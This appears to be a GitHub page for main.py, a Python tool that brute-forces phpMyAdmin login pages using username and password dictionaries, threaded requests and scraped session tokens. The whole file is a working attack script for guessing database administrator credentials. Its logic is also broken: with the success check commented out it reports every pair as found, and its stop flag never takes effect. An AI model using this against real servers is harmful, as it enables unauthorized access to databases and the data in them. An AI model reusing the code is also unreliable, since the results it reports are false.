-
Notifications
You must be signed in to change notification settings - Fork 33
/
main.py
96 lines (79 loc) · 2.37 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
#!/usr/bin/env python3
from ast import arg
from concurrent.futures import thread
import sys
import requests
import html
import re
import os
import argparse
import threading, time
stop_flag = 0
def login(url, username, password):
for i in range(3):
try:
res = requests.get(url)
cookies = dict(res.cookies)
data = {
'set_session': html.unescape(re.search(r"name=\"set_session\" value=\"(.+?)\"", res.text, re.I).group(1)),
'token': html.unescape(re.search(r"name=\"token\" value=\"(.+?)\"", res.text, re.I).group(1)),
'pma_username': username,
'pma_password': password,
}
res = requests.post(url, cookies=cookies, data=data)
cookies = dict(res.cookies)
#return 'pmaAuth-1' in cookies
print("[*] FOUND - %s / %s" % (username, password))
f = open("found.txt", "w")
f.write("%s / %s\n" % (username, password))
f.close()
stop_flag = 1
except:
pass
print("[!] FAILED - %s / %s" % (username, password))
def bruteforce(users, passwords, url):
for user in users:
for password in passwords:
try:
if stop_flag == 1:
t.join()
exit()
t = threading.Thread(target = login, args = (url, user, password))
t.start()
time.sleep(0.2)
except KeyboardInterrupt:
t.join()
print("Cancelling")
exit()
t.join()
def main():
parser = argparse.ArgumentParser(description='e.g. python3 %s -url http://example.com/pma/ -user root -dict password.txt' % (os.path.basename(__file__)))
parser.add_argument('-url', help='The URL of target website')
parser.add_argument('-user', default='root', help='The username of MySQL (default: root)')
parser.add_argument('-udict', default='none.txt', help='The file path of username dictionary (default: NULL)')
parser.add_argument('-pdict', default='password.txt', help='The file path of password dictionary (default: password.txt)')
args = parser.parse_args()
url = args.url
pwdDictionary = args.pdict
userDictionary = args.udict
if url is None:
parser.print_help()
return
#Getting passwords
try:
f = open(pwdDictionary, "r")
passwords = re.split("[\r\n]+", f.read())
f.close()
except:
print("[-] Failed to read '%s' file." % (pwdDictionary))
return
#Getting users
try:
f = open(userDictionary, "r")
users = re.split("[\r\n]+", f.read())
f.close()
except:
users = [args.user]
bruteforce(users, passwords, url)
if __name__ == '__main__':
main()